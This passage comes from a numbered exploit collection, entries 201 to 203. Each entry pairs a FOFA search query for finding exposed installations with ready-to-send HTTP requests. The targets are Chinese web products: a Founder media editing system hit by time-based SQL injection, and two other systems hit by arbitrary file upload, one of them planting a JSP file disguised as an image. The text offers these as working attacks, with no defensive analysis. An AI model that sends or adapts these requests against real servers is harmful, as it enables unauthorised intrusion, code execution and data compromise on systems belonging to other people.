Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
